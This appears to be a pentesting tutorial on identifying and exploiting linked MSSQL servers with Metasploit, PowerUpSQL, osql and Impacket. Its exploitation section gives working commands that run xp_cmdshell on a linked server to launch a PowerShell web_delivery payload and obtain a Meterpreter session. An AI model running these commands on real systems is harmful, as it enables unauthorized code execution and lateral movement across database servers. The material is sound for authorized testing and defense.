Intro

Linked MSSQL servers permit one database to access data in a remote database server, outside of the immediate MSSQL server instance. Servers are not inherently vulnerable just because the servers are linked. Rather, servers vulnerable to initial compromise, such as those with insecure credentials, or those where xp_cmdshell is authorized for insecure accounts, can provide a pathway to exploitation.

Identifying Vulnerable Linked MSSQL Servers

There are two ways for identifying Linked MSSQL servers - Metasploit Module and PowerUpSQL. Both essentially do the same thing, and can used by using Windows authentication (where permitted by the link).

Metasploit has a module called windows/mssql/mssql_linkcrawler which can be used to enumerate linked servers, permissions, and users with sysadmin rights.

Metasploit settings for mssql_linkcrawler

mssql_linkcrawler output providing information on the link

The feedback is nearly identical as the get-sqlserverlinkcrawl -verbose command from PowerUpSQL.

PowerUpSQL get-sqlserverlinkcrawl output

Exploitation

There are different ways to exploit the link once it is identified. Impacket has a tool called mssqlclient.py, and Windows servers that host MSSQL have the osql set of commands.

As an example below, osql is used to run a PowerShell runner with a web_delivery payload

osql -E -S "hostname" -Q "EXECUTE('exec master..xp_cmdshell ''powershell -File C:\Users\public\documents\pstest.ps1''') AT [linked.server.local]"

Meterpreter session via osql

Utilizing mssqlclient.py, the same is possible. First, authenticate with valid credentials for the server, and then execute

EXECUTE('exec master..xp_cmdshell ''powershell -File C:\Users\public\documents\pstest.ps1''') AT [linked.server.local]